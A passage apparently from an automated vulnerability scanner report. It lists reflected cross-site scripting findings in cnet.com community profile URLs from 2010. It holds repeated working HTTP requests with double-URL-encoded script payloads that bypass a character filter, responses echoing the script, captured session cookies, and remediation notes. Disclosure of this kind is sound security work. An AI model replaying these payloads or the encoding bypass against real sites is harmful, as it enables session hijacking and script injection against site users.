Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:12:11 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:12:11 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=995
Connection: Keep-Alive
Content-Length: 31050

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<li>Dan_Ackermanb8a4d<script>alert(1)</script>428bca84c78's community profile</li>
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64e20%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecdf8049e6f2 was submitted in the REST URL parameter 2. This input was echoed as 64e20"><script>alert(1)</script>cdf8049e6f2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/Dan_Ackerman64e20%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecdf8049e6f2/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:12:10 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:12:10 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=991
Connection: Keep-Alive
Content-Length: 31228

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<input type="hidden" name="profileName" value="Dan_Ackerman64e20"><script>alert(1)</script>cdf8049e6f2"/>
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7611%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4bb07ea02a5 was submitted in the REST URL parameter 2. This input was echoed as c7611"><script>alert(1)</script>4bb07ea02a5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/Daniel+Terdimanc7611%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4bb07ea02a5/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:07:19 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:07:19 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=882
Connection: Keep-Alive
Content-Length: 31216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<input type="hidden" name="profileName" value="Daniel Terdimanc7611"><script>alert(1)</script>4bb07ea02a5"/>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3097f%253cscript%253ealert%25281%2529%253c%252fscript%253e740aa84c9a3 was submitted in the REST URL parameter 2. This input was echoed as 3097f<script>alert(1)</script>740aa84c9a3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/Daniel+Terdiman3097f%253cscript%253ealert%25281%2529%253c%252fscript%253e740aa84c9a3/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:07:20 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:07:20 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=930
Connection: Keep-Alive
Content-Length: 31114

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<li>Daniel Terdiman3097f<script>alert(1)</script>740aa84c9a3's community profile</li>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c5add%253cscript%253ealert%25281%2529%253c%252fscript%253e37d56e43f5 was submitted in the REST URL parameter 2. This input was echoed as c5add<script>alert(1)</script>37d56e43f5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/Gadget70c5add%253cscript%253ealert%25281%2529%253c%252fscript%253e37d56e43f5/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:15:50 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:15:50 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=983
Connection: Keep-Alive
Content-Length: 31005

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<li>Gadget70c5add<script>alert(1)</script>37d56e43f5's community profile</li>
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df0a0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec1f2218babc was submitted in the REST URL parameter 2. This input was echoed as df0a0"><script>alert(1)</script>c1f2218babc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/Gadget70df0a0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec1f2218babc/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:15:49 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:15:49 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=976
Connection: Keep-Alive
Content-Length: 31057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<input type="hidden" name="profileName" value="Gadget70df0a0"><script>alert(1)</script>c1f2218babc"/>
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 364e2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9df162abdf1 was submitted in the REST URL parameter 2. This input was echoed as 364e2"><script>alert(1)</script>9df162abdf1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/Ina+Fried364e2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9df162abdf1/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:07:21 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:07:22 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=977
Connection: Keep-Alive
Content-Length: 31107

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<input type="hidden" name="profileName" value="Ina Fried364e2"><script>alert(1)</script>9df162abdf1"/>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ae022%253cscript%253ealert%25281%2529%253c%252fscript%253e7e659d1ae29 was submitted in the REST URL parameter 2. This input was echoed as ae022<script>alert(1)</script>7e659d1ae29 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/Ina+Friedae022%253cscript%253ealert%25281%2529%253c%252fscript%253e7e659d1ae29/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:07:23 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:07:23 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=877
Connection: Keep-Alive
Content-Length: 31034

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<li>Ina Friedae022<script>alert(1)</script>7e659d1ae29's community profile</li>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a8b0d%253cscript%253ealert%25281%2529%253c%252fscript%253e113d1f8a06e was submitted in the REST URL parameter 2. This input was echoed as a8b0d<script>alert(1)</script>113d1f8a06e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/J-Doa8b0d%253cscript%253ealert%25281%2529%253c%252fscript%253e113d1f8a06e/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:09:41 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:09:41 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=960
Connection: Keep-Alive
Content-Length: 30982

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<li>J-Doa8b0d<script>alert(1)</script>113d1f8a06e's community profile</li>
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 957c9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb6e488cde22 was submitted in the REST URL parameter 2. This input was echoed as 957c9"><script>alert(1)</script>b6e488cde22 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/J-Do957c9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb6e488cde22/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:09:40 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:09:40 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=990
Connection: Keep-Alive
Content-Length: 31057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<input type="hidden" name="profileName" value="J-Do957c9"><script>alert(1)</script>b6e488cde22"/>
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc5df%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb032ea72a6 was submitted in the REST URL parameter 2. This input was echoed as fc5df"><script>alert(1)</script>b032ea72a6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/JJKaminskifc5df%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb032ea72a6/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:10:20 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:10:20 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=995
Connection: Keep-Alive
Content-Length: 31091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<input type="hidden" name="profileName" value="JJKaminskifc5df"><script>alert(1)</script>b032ea72a6"/>
...[SNIP]...
